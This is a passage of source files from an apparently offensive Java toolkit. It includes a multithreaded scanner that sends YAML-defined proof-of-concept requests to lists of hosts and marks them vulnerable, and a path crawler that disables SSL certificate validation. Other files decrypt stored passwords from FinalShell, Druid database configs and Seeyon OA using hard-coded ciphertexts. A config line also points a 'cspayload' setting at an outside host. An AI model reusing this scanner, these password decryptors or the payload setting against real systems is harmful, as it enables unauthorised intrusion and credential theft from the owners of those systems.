 88 |                 String[][] requestHeader2 = inputurl(requestHeader, url);
 89 | 
 90 |                 if (url.contains("http://"))
 91 |                     ishttps = "http";
 92 |                 else if(url.contains("https://"))
 93 |                     ishttps = "https";
 94 | 
 95 |                 // 根据替换后的url来发起请求
 96 |                 Map responseHeaderbody = listMakeRequest(requestHeader2 , ishttps);
 97 | 
 98 |                 for (String key : responseHeaderbody.keySet()) {
 99 |                     try {
100 |                         String[] response = responseHeaderbody.get(key).split("ms\n");
101 | 
102 |                         final_list[0] = response[0].split(":")[1].split("ms")[0];
103 |                         System.out.println("final_list[0]" +  final_list[0]);
104 |                         final_list[1] = key.replace("null:", "").replace("[", "").replace("]", "") + '\n' + response[1];
105 |                     } catch (ArrayIndexOutOfBoundsException e) { // 捕捉响应为空的请求体
106 |                         ;
107 |                     }
108 |                 }
109 |             } catch (Exception ex) {
110 |                 ;
111 |             } finally {
112 |                 try{
113 |                     a = Integer.parseInt(final_list[0]);
114 |                     if (((final_list[1].contains(conditionword))&&(!conditionword.equals("")))  ||  (( a >= conditiontime) && ( a <= 1.5 * conditiontime) && (a != 0))){
115 |                         poctoexplist = url + "``````````````````````````存在漏洞";
116 |                     }else{
117 |                         poctoexplist = url ;
118 |                     }
119 | 
120 |                 }catch (NullPointerException e){
121 |                     poctoexplist = url;
122 |                 }catch (NumberFormatException e){
123 |                     a = 0;
124 |                 }
125 |                 vullist.add(poctoexplist);
126 |                 lock.unlock();     // 解锁
127 |             }
128 | 
129 |         }
130 |     }
131 | 
132 |     public static void main(String[] args) {
133 | //        System.setProperty("https.proxyHost", "127.0.0.1");
134 | //        System.setProperty("https.proxyPort", "8080");
135 | //        System.setProperty("http.proxyHost", "127.0.0.1");
136 | //        System.setProperty("http.proxyPort", "8080");
137 | 
138 | //        long start = System.currentTimeMillis();
139 |         int conditiontime = 0;
140 |         String conditionwords = "";
141 |         String pocname = "poc/test/test.yml";
142 |         String[] url_list = {"http://baidu.com","http://hao123.com","http://baidu2.com","http://hao1232.com","https://165.212.109.228","https://165.124.129.66"};
143 |         test6test a = new test6test();
144 |         a.getUriList(pocname, url_list,conditiontime,conditionwords);
145 | 
146 | 
147 |     }
148 | 
149 | }


--------------------------------------------------------------------------------
/src/main/RequestPoc/test7.java:
--------------------------------------------------------------------------------
  1 | package main.RequestPoc;
  2 | 
  3 | import java.io.BufferedReader;
  4 | import java.io.InputStreamReader;
  5 | import java.net.URL;
  6 | import java.net.URLConnection;
  7 | import java.security.KeyManagementException;
  8 | import java.security.NoSuchAlgorithmException;
  9 | import java.security.cert.X509Certificate;
 10 | import java.util.*;
 11 | import java.util.concurrent.ExecutorService;
 12 | import java.util.concurrent.Executors;
 13 | import java.util.concurrent.locks.Lock;
 14 | import java.util.concurrent.locks.ReentrantLock;
 15 | import java.util.regex.Matcher;
 16 | import java.util.regex.Pattern;
 17 | import javax.net.ssl.*;
 18 | import main.Poc2ExpguiController;
 19 | import static main.RequestPoc.Readfile.exptoexp;
 20 | import static main.RequestPoc.Readfile.ymlFiletoexp;
 21 | import static main.RequestPoc.makeRequest.inputurl;
 22 | import static main.RequestPoc.makeRequest.listMakeRequest;
 23 | import static main.RequestPoc.test7.Url.extractLists;
 24 | 
 25 | public class test7 {
 26 |     static {
 27 |         try {
 28 |             test7.disableSSLCertificateChecking();
 29 |         } catch (NoSuchAlgorithmException e) {
 30 |             e.printStackTrace();
 31 |         } catch (KeyManagementException e) {
 32 |             e.printStackTrace();
 33 |         }
 34 |     }
 35 | 
 36 |     private static void disableSSLCertificateChecking() throws NoSuchAlgorithmException, KeyManagementException {
 37 |         TrustManager[] trustAllCerts = new TrustManager[] {new X509TrustManager() {
 38 |             public java.security.cert.X509Certificate[] getAcceptedIssuers() {
 39 |                 return null;
 40 |             }
 41 |             public void checkClientTrusted(X509Certificate[] certs, String authType) {
 42 |             }
 43 |             public void checkServerTrusted(X509Certificate[] certs, String authType) {
 44 |             }
 45 |         }
 46 |         };
 47 |         SSLContext sc = SSLContext.getInstance("SSL");
 48 |         sc.init(null, trustAllCerts, new java.security.SecureRandom());
 49 |         HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
 50 |         HostnameVerifier allHostsValid = new HostnameVerifier(){
 51 |             public boolean verify(String hostname, SSLSession session) {
 52 |                 return true;
 53 |             }
 54 |         };
 55 |         HttpsURLConnection.setDefaultHostnameVerifier(allHostsValid);
 56 |     }
 57 | 
 58 |     public static List vullist = new ArrayList();
 59 |     public test7() {
 60 |     }
 61 |     public void getUriList( String[] url_list,String pocname){
 62 |         List list = new ArrayList();
 63 |         ExecutorService executor = Executors.newCachedThreadPool();
 64 |         try{
 65 |             for(int i = 0; i < url_list.length; i++) {
 66 |                 MyRunnable runnable = new MyRunnable(pocname);
 67 |                 Thread thread = new Thread(runnable, url_list[i]);
 68 |                 thread.start();
 69 |                 list.add(thread);
 70 |             }
 71 |             try {
 72 |                 for(Thread thread : list) {
 73 |                     thread.join();
 74 |                 }
 75 |             } catch (InterruptedException e) {
 76 | //                e.printStackTrace();
 77 |             }
 78 | 
 79 |         }catch (ArrayIndexOutOfBoundsException e){
 80 |             ;
 81 |         }
 82 |         executor.shutdown();
 83 |         while (!executor.isTerminated()){}
 84 |     }
 85 | 
 86 |     public static class MyRunnable implements Runnable {
 87 |         String pocname;
 88 |         public MyRunnable( String pocname){
 89 |             this.pocname = pocname;
 90 | 
 91 |         }
 92 | 
 93 |         @Override
 94 |         public void run() {
 95 |             System.out.println(Thread.currentThread().getName() + " start");
 96 |             Url a = new Url();
 97 |             a.addList(Thread.currentThread().getName(),pocname);
 98 |             System.out.println(Thread.currentThread().getName() + " end");
 99 |         }
100 | 
101 |     }
102 |     public static class Url {
103 | 
104 |         private static Lock lock = new ReentrantLock();     // 开启显式家锁
105 | 
106 |         public Url() {
107 |         }
108 | 
109 |         public void addList( String url,String pocname){
110 |             lock.lock();
111 | 
112 |             try {
113 | 
114 |                 Set response = extractLists(url,pocname);
115 |                 for (String str:response)
116 |                     vullist.add(str);
117 | 
118 |                 // 根据替换后的url来发起请求
119 | 
120 |             } catch (Exception ex) {
121 |                 ;
122 |             } finally {
123 |                 lock.unlock();     // 解锁
124 |             }
125 |         }
126 | 
127 |         public static Set extractLists (String url ,String pat){
128 |             Set response_uri_lists = new HashSet<>();
129 | 
130 |             String response = sendGet(url) ;
131 |             String pattern;
132 | 
133 | //        String pattern = "(org\\..*?|net\\..*?)[<|&|\"| ]";
134 |             if (pat.contains(".."))
135 |                 pattern =  pat + "[a-zA-Z0-9_./-]{1,}";
136 |             else
137 |                 pattern =   pat + "[a-zA-Z0-9_./-]{1,}";
138 | //                  pattern = "/(.*)";
139 |             // 创建 Pattern 对象
140 |             System.out.println(pattern);
141 |             Pattern r = Pattern.compile(pattern);
142 |             // 现在创建 matcher 对象
143 |             Matcher m = r.matcher(response);
144 |             while(m.find()) {
145 |                 String single_uri = m.group().trim().replace("\"","").replace("<","")
146 |                         .replace("&","");
147 | 
148 |                 if (single_uri.contains("*"))
149 |                     continue;
150 |                 else {
151 |                     response_uri_lists.add(single_uri);
152 |                 }
153 |             }
154 | 
155 |             return response_uri_lists;
156 |         }
157 | 
158 |         public static Set extractListsinput (String input ,String pat){
159 |             Set response_uri_lists = new HashSet<>();
160 | 
161 |             String pattern;
162 | 
163 | //        String pattern = "(org\\..*?|net\\..*?)[<|&|\"| ]";
164 |             if (pat.contains(".."))
165 |                 pattern =  pat + "[a-zA-Z0-9_./-]{1,}";
166 |             else
167 |                 pattern =   pat + "[a-zA-Z0-9_./-]{1,}";
168 | //                  pattern = "/(.*)";
169 |             // 创建 Pattern 对象
170 |             System.out.println(pattern);
171 |             Pattern r = Pattern.compile(pattern);
172 |             // 现在创建 matcher 对象
173 |             Matcher m = r.matcher(input);
174 |             while(m.find()) {
175 |                 String single_uri = m.group().trim().replace("\"","").replace("<","")
176 |                         .replace("&","");
177 | 
178 |                 if (single_uri.contains("*"))
179 |                     continue;
180 |                 else {
181 |                     response_uri_lists.add(single_uri);
182 |                 }
183 |             }
184 | 
185 |             return response_uri_lists;
186 |         }
187 | 
188 |         public static String sendGet(String url) {
189 |             String result = "";
190 |             BufferedReader in = null;
191 |             if (url.contains("/heapdump")){
192 |                 return "";
193 |             }
194 |             try {
195 |                 String urlNameString = url ;
196 |                 URL realUrl = new URL(urlNameString);
197 |                 // 打开和URL之间的连接
198 |                 URLConnection connection = realUrl.openConnection();
199 |                 // 设置通用的请求属性
200 |                 connection.setRequestProperty( "user-agent" , "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)");
201 |                 // 建立实际的连接
202 |                 connection.connect();
203 |                 // 获取所有响应头字段
204 | 
205 |                 // 定义 BufferedReader输入流来读取URL的响应
206 |                 in = new BufferedReader(new InputStreamReader(
207 |                         connection.getInputStream()));
208 |                 String line;
209 |                 while ((line = in.readLine()) != null) {
210 |                     result += line;
211 |                 }
212 |             } catch (Exception e) {
213 |                 result = "发送请求出现异常!";
214 |                 System.out.println("发送请求出现异常!" + e);
215 | //                e.printStackTrace();
216 |             }
217 |             // 使用finally块来关闭输入流
218 |             finally {
219 |                 try {
220 |                     if (in != null) {
221 |                         in.close();
222 |                     }
223 |                 } catch (Exception e2) {
224 | //                    e2.printStackTrace();
225 |                 }
226 |             }
227 |             return result;
228 |         }
229 |     }
230 | 
231 |     public static void main(String[] args) {
232 | //        System.setProperty("https.proxyHost", "127.0.0.1");
233 | //        System.setProperty("https.proxyPort", "8080");
234 | //        System.setProperty("http.proxyHost", "127.0.0.1");
235 | //        System.setProperty("http.proxyPort", "8080");
236 | 
237 |         String url = "";
238 | 
239 | 
240 |         String pattern = "(http[s]{0,1}://.*?)/|(http[s]{0,1}://.*)";
241 | 
242 | //        String pat = "org.\nnet."; // 匹配的
243 |         String total = "";
244 | //        (org\..*?|net\..*?)
245 |         String pat = ""; // 匹配的
246 |         if (pat.contains(".")){
247 | 
248 |             String[] pats = pat.split("\n");
249 |             for( String str: pats) {
250 |                 total = total + str.replace(".", "\\.");
251 |                 total = total + ".*?|";
252 |             }
253 |             pat = "(" + total.substring(0,total.length()-1) + ")";
254 | 
255 |         }else{
256 |             if (pat.equals(""))
257 |                 pat = "/";
258 |         }
259 | 
260 |         String black_lists = ".html\n.ftl\n//"; // 黑名单
261 |         String[] url_list ;
262 | 
263 |         // 创建 Pattern 对象
264 |         Pattern r = Pattern.compile(pattern);
265 |         // 现在创建 matcher 对象
266 |         Matcher m = r.matcher(url);
267 |         m.find();
268 |         String host = m.group(); // 获取协议+域名
269 |         Set response = extractLists(url, pat);
270 | 
271 |         url_list = new ArrayList<>(response).toArray(new String[0]);
272 | 
273 |         for (int i = 0; i < url_list.length; i++) {
274 |             test7.vullist.add(url_list[i]);
275 |             if (!url_list[i].contains("http"))
276 |                 url_list[i] = host.substring(0, host.length() - 1) + url_list[i];
277 |         }
278 | 
279 |         test7 a = new test7();
280 |         a.getUriList( url_list , pat );
281 |         String total2 = "" ;
282 |         String[] blacklists = black_lists.split("\n");
283 |         Set total_lists = new HashSet<>();
284 | 
285 |         for (String strr: test7.vullist) {
286 |             String isblack = "0";
287 |             if (!black_lists.equals(""))
288 |             for (String str:blacklists) { // 剔除黑名单
289 |                 if (strr.contains(str))
290 |                     isblack = "1";
291 |             }
292 |             if (isblack.equals("0"))
293 |                 total_lists.add(strr.trim());
294 |         }
295 |         for (String strr: total_lists) {
296 |             total2 = total2 + strr + "\n";
297 |         }
298 |         System.out.println(total2);
299 |     }
300 | }


--------------------------------------------------------------------------------
/src/main/finalshelltest/Oracledecode.java:
--------------------------------------------------------------------------------
  1 | package main.finalshelltest;
  2 | 
  3 | import java.io.ByteArrayInputStream;
  4 | import java.io.ByteArrayOutputStream;
  5 | import java.io.IOException;
  6 | import java.util.zip.ZipEntry;
  7 | import java.util.zip.ZipInputStream;
  8 | import java.util.zip.ZipOutputStream;
  9 | // 不一定是oracle的,只是看到了使用zip加密加密字符串
 10 | 
 11 | public class Oracledecode {
 12 |     public static void main(String[] args) {
 13 | 
 14 |         System.out.println(unzip("UEsDBBQACAgIAK5QqUoAAAAAAAAAAAAAAAABAAAAMCtJLS4BAFBLBwgMfn/YBgAAAAQAAAA="));
 15 | 
 16 |     }
 17 |     /**
 18 |      * 使用zip进行压缩
 19 |      *
 20 |      * @param str 压缩前的文本
 21 |      * @return 返回压缩后的文本
 22 |      */
 23 |     public static final String zip(String str) {
 24 |         if (str == null)
 25 |             return null;
 26 |         byte[] compressed;
 27 |         ByteArrayOutputStream out = null;
 28 |         ZipOutputStream zout = null;
 29 |         String compressedStr = null;
 30 |         try {
 31 |             out = new ByteArrayOutputStream();
 32 |             zout = new ZipOutputStream(out);
 33 |             zout.putNextEntry(new ZipEntry("0"));
 34 |             zout.write(str.getBytes());
 35 |             zout.closeEntry();
 36 |             compressed = out.toByteArray();
 37 |             compressedStr = new sun.misc.BASE64Encoder().encodeBuffer(compressed);
 38 |         } catch (IOException e) {
 39 |             compressed = null;
 40 |         } finally {
 41 |             if (zout != null) {
 42 |                 try {
 43 |                     zout.close();
 44 |                 } catch (IOException e) {
 45 |                 }
 46 |             }
 47 |             if (out != null) {
 48 |                 try {
 49 |                     out.close();
 50 |                 } catch (IOException e) {
 51 |                 }
 52 |             }
 53 |         }
 54 |         return compressedStr;
 55 |     }
 56 | 
 57 |     /**
 58 |      * 使用zip进行解压缩
 59 |      *
 60 |      * @param compressedStr 压缩后的文本
 61 |      * @return 解压后的字符串
 62 |      */
 63 |     public static final String unzip(String compressedStr) {
 64 |         if (compressedStr == null) {
 65 |             return null;
 66 |         }
 67 | 
 68 |         ByteArrayOutputStream out = null;
 69 |         ByteArrayInputStream in = null;
 70 |         ZipInputStream zin = null;
 71 |         String decompressed = null;
 72 |         try {
 73 |             byte[] compressed = new sun.misc.BASE64Decoder().decodeBuffer(compressedStr);
 74 |             out = new ByteArrayOutputStream();
 75 |             in = new ByteArrayInputStream(compressed);
 76 |             zin = new ZipInputStream(in);
 77 |             zin.getNextEntry();
 78 |             byte[] buffer = new byte[1024];
 79 |             int offset = -1;
 80 |             while ((offset = zin.read(buffer)) != -1) {
 81 |                 out.write(buffer, 0, offset);
 82 |             }
 83 |             decompressed = out.toString();
 84 |         } catch (IOException e) {
 85 |             decompressed = null;
 86 |         } finally {
 87 |             if (zin != null) {
 88 |                 try {
 89 |                     zin.close();
 90 |                 } catch (IOException e) {
 91 |                 }
 92 |             }
 93 |             if (in != null) {
 94 |                 try {
 95 |                     in.close();
 96 |                 } catch (IOException e) {
 97 |                 }
 98 |             }
 99 |             if (out != null) {
100 |                 try {
101 |                     out.close();
102 |                 } catch (IOException e) {
103 |                 }
104 |             }
105 |         }
106 |         return decompressed;
107 |     }
108 | }
109 | 


--------------------------------------------------------------------------------
/src/main/finalshelltest/druid1016after.java:
--------------------------------------------------------------------------------
 1 | package main.finalshelltest;
 2 | 
 3 | import com.alibaba.druid.filter.config.ConfigTools;
 4 | 
 5 | public class druid1016after {
 6 |     public static void main(String[] args) throws Exception {
 7 | 
 8 | //        // 密码明文
 9 | //        String password = "1q2w3e4r";
10 | //
11 | //        System.out.println("密码[ " + password + " ]的加密信息如下:\n");
12 | //
13 | //        String[] keyPair = ConfigTools.genKeyPair(512);
14 | //        // 私钥
15 | //        String privateKey = keyPair[0];
16 | //        // 公钥
17 | //        String publicKey = keyPair[1];
18 | //        // 用私钥加密后的密文
19 | //        password = ConfigTools.encrypt(privateKey, password);
20 | //
21 | //        System.out.println("privateKey:" + privateKey);
22 | //        System.out.println("publicKey:" + publicKey);
23 | //        System.out.println("password:" + password);
24 | //        String decryptPassword = ConfigTools.decrypt(publicKey, password);
25 | //        System.out.println("decryptPassword:" + decryptPassword);
26 | 
27 | 
28 | //        String cipherText = "HShsmthuOQtUyzlXNu2f8prK1/NEI/RcKjTWSFg1mBI/bFchRYJs9p32etYEEe9UsDDk8jKDsm6/RP5Yr+s8Cg==";
29 | 
30 |             String publickey = "MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAIhmJn/IljtzrVJRdMFmCdMMTHzf7lnIRH5KgZ9jMdmK1ZeTO39fqaCBIvA6eE3BwX7inS9w9UejKku5D6TJDoUCAwEAAQ==";
31 |             String password = "M9gTODvsTFcUFMuPJHOb4JMrVKwHHrh8tp2iEoPQ7F85t5ez4ZGe0l/GRMAkidVyion7WQch79FCcBHmCvPS9w==";
32 |             System.out.println(ConfigTools.decrypt(publickey, password));
33 |             System.out.println("111");
34 | 
35 |     }
36 | }
37 | 


--------------------------------------------------------------------------------
/src/main/finalshelltest/druidOutputpassword.java:
--------------------------------------------------------------------------------
 1 | package main.finalshelltest;
 2 | 
 3 | import com.alibaba.druid.filter.config.ConfigTools;
 4 | 
 5 | public class druidOutputpassword {
 6 |     public static void main(String[] args) throws Exception {
 7 | 
 8 |         System.out.println(ConfigTools.decrypt("hbZoFfr14R2yGuWJwbUtYdXjF40Df5sXbHSJYzGECsK0p1W4bmrM64SJKU0rmWo+yjUSrtU1Drb+0eGhQT3Xlg=="));
 9 |         System.out.println("1111");
10 | //        rKYM0eaAc99uCtsMLLS9GQq9ty5q1yuRLmqFvxgQFfEhtqWxk+ctceVZlZ3Euh+Cx1b1wSM5VPUz66CkmwNdqw==
11 | //  DtZrDfgC+aEicYlH09WoJC6ptuHvj5YQdStXhNHKeV7CvpX5psusl0UDK4236TC0/1GxzdkHE39vPFCkjXLLgA==
12 | 
13 |     }
14 | }
15 | 


--------------------------------------------------------------------------------
/src/main/finalshelltest/finalshellDecode.java:
--------------------------------------------------------------------------------
  1 | package main.finalshelltest;
  2 | 
  3 | import java.io.*;
  4 | import java.math.BigInteger;
  5 | import java.security.MessageDigest;
  6 | import java.security.NoSuchAlgorithmException;
  7 | import java.security.SecureRandom;
  8 | import java.util.Base64;
  9 | import java.util.Random;
 10 | 
 11 | import javax.crypto.Cipher;
 12 | import javax.crypto.SecretKey;
 13 | import javax.crypto.SecretKeyFactory;
 14 | import javax.crypto.spec.DESKeySpec;
 15 | 
 16 | public class finalshellDecode {
 17 |     public static void main(String[] args)throws Exception {
 18 | 
 19 | //        File file = new File("src/main/2.txt");
 20 | //        BufferedReader reader = null;
 21 | //        reader = new BufferedReader(new FileReader(file));
 22 | //    String tempString = null ;
 23 | //        try {
 24 | //            reader = new BufferedReader(new FileReader(file));
 25 | //            int line = 0 ;
 26 | //            // 一次读入一行,直到读入null为文件结束
 27 | //            while ((tempString = reader.readLine()) != null) {
 28 | //                System.out.println(decodePass(tempString));
 29 | //            }}catch (IOException e){}
 30 | 
 31 |         System.out.println(decodePass("MEc5E0ksO1kOJL4+CVQCvxPgE6KCj8ji"));
 32 |     }
 33 | 
 34 |     public static byte[] desDecode(byte[] data, byte[] head) throws Exception {
 35 |         SecureRandom sr = new SecureRandom();
 36 |         DESKeySpec dks = new DESKeySpec(head);
 37 |         SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("DES");
 38 |         SecretKey securekey = keyFactory.generateSecret(dks);
 39 |         Cipher cipher = Cipher.getInstance("DES");
 40 |         cipher.init(2, securekey, sr);
 41 |         return cipher.doFinal(data);
 42 |     }
 43 | 
 44 |     public static String decodePass(String data) throws Exception {
 45 |         if (data == null) {
 46 |             return null;
 47 |         } else {
 48 |             String rs = "";
 49 |             byte[] buf = Base64.getDecoder().decode(data);
 50 |             byte[] head = new byte[8];
 51 |             System.arraycopy(buf, 0, head, 0, head.length);
 52 |             byte[] d = new byte[buf.length - head.length];
 53 |             System.arraycopy(buf, head.length, d, 0, d.length);
 54 |             byte[] bt = desDecode(d, ranDomKey(head));
 55 |             rs = new String(bt);
 56 | 
 57 |             return rs;
 58 |         }
 59 |     }
 60 | 
 61 |     static byte[] ranDomKey(byte[] head) {
 62 |         long ks = 3680984568597093857L / (long)(new Random((long)head[5])).nextInt(127);
 63 |         Random random = new Random(ks);
 64 |         int t = head[0];
 65 | 
 66 |         for(int i = 0; i < t; ++i) {
 67 |             random.nextLong();
 68 |         }
 69 | 
 70 |         long n = random.nextLong();
 71 |         Random r2 = new Random(n);
 72 |         long[] ld = new long[]{(long)head[4], r2.nextLong(), (long)head[7], (long)head[3], r2.nextLong(), (long)head[1], random.nextLong(), (long)head[2]};
 73 |         ByteArrayOutputStream bos = new ByteArrayOutputStream();
 74 |         DataOutputStream dos = new DataOutputStream(bos);
 75 |         long[] var15 = ld;
 76 |         int var14 = ld.length;
 77 | 
 78 |         for(int var13 = 0; var13 < var14; ++var13) {
 79 |             long l = var15[var13];
 80 | 
 81 |             try {
 82 |                 dos.writeLong(l);
 83 |             } catch (IOException var18) {
 84 |                 var18.printStackTrace();
 85 |             }
 86 |         }
 87 | 
 88 |         try {
 89 |             dos.close();
 90 |         } catch (IOException var17) {
 91 |             var17.printStackTrace();
 92 |         }
 93 | 
 94 |         byte[] keyData = bos.toByteArray();
 95 |         keyData = md5(keyData);
 96 |         return keyData;
 97 |     }
 98 |     public static byte[] md5(byte[] data) {
 99 |         String ret = null;
100 |         byte[] res=null;
101 | 
102 |         try {
103 |             MessageDigest m;
104 |             m = MessageDigest.getInstance("MD5");
105 |             m.update(data, 0, data.length);
106 |             res=m.digest();
107 |             ret = new BigInteger(1, res).toString(16);
108 |         } catch (NoSuchAlgorithmException e) {
109 |             e.printStackTrace();
110 |         }
111 |         return res;
112 |     }
113 | }
114 | 


--------------------------------------------------------------------------------
/src/main/finalshelltest/seeyonGetpass.java:
--------------------------------------------------------------------------------
 1 | package main.finalshelltest;
 2 | 
 3 | 
 4 | import java.io.IOException;
 5 | import java.util.Base64;
 6 | import sun.misc.BASE64Decoder;
 7 | import sun.misc.BASE64Encoder;
 8 | 
 9 | 
10 | public class seeyonGetpass {
11 |     private static String SrcData = "dGZzd2ZzcGIzLzYyOTQyNQ==";
12 | 
13 |     public static void log(String s) {
14 |         System.out.println("------>" + s);
15 |     }
16 | 
17 |     public static void main(String[] args) throws Exception {
18 | 
19 |         log("jdk base64Decode2:" + jdkBas64Decode2(SrcData));
20 |         String asciis = stringToAscii(jdkBas64Decode2(SrcData));
21 |         log(asciiToString(asciis));
22 |     }
23 |     public static String stringToAscii(String value)
24 |     {
25 |         StringBuffer sbu = new StringBuffer();
26 |         char[] chars = value.toCharArray();
27 |         for (int i = 0; i < chars.length; i++) {
28 |             if(i != chars.length - 1)
29 |             {
30 |                 sbu.append((int)chars[i]-1).append(",");
31 |             }
32 |             else {
33 |                 sbu.append((int)chars[i]-1);
34 |             }
35 |         }
36 |         return sbu.toString();
37 |     }
38 | 
39 |     public static String asciiToString(String value)
40 |     {
41 |         StringBuffer sbu = new StringBuffer();
42 |         String[] chars = value.split(",");
43 |         for (int i = 0; i < chars.length; i++) {
44 |             sbu.append((char) Integer.parseInt(chars[i]));
45 |         }
46 |         return sbu.toString();
47 |     }
48 | 
49 |     // jdk base64加密 jdk util
50 |     private static String jdkBas64Encode2(String src) {
51 |         return Base64.getEncoder().encodeToString(src.getBytes());
52 |     }
53 | 
54 |     // jdk base64揭秘 jdk util
55 |     public static String jdkBas64Decode2(String encodeData) {
56 |         return new String(Base64.getDecoder().decode(encodeData));
57 |     }
58 | }
59 | 


--------------------------------------------------------------------------------
/src/main/javafxtest/ListViewTest.java:
--------------------------------------------------------------------------------
 1 | package main.javafxtest;
 2 | 
 3 | import java.io.File;
 4 | import javafx.application.Application;
 5 | import javafx.event.ActionEvent;
 6 | import javafx.event.EventHandler;
 7 | import javafx.scene.Scene;
 8 | import javafx.scene.control.Button;
 9 | import javafx.scene.control.ListView;
10 | import javafx.scene.control.SelectionMode;
11 | import javafx.scene.layout.Pane;
12 | import javafx.scene.layout.VBox;
13 | import javafx.stage.Stage;
14 | 
15 | public class ListViewTest  {
16 | 
17 |     public static void main(String[] args) {
18 |         String dirname = "/Users/f0ngf0ng/JAVA/seeyontest/poc/";
19 |         File file = new File(dirname);
20 |         File[] files = file.listFiles();
21 |         assert files != null;
22 |         for (File file2 : files) {
23 |             if (file2.getAbsolutePath().indexOf(".DS_Store")>0){
24 | 
25 |             }
26 |             else {
27 |                 System.out.println(file2);
28 |             }
29 |         }
30 |     }
31 | }


--------------------------------------------------------------------------------
/src/main/resources/config.properties:
--------------------------------------------------------------------------------
1 | python2path=python
2 | python3path=python3
3 | cspayload=http://8.8.8.8/f0ng


--------------------------------------------------------------------------------
/src/main/resources/proxy.fxml:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
 6 | 
 7 | 
 8 | 
 9 | 
10 |    
11 |       
12 |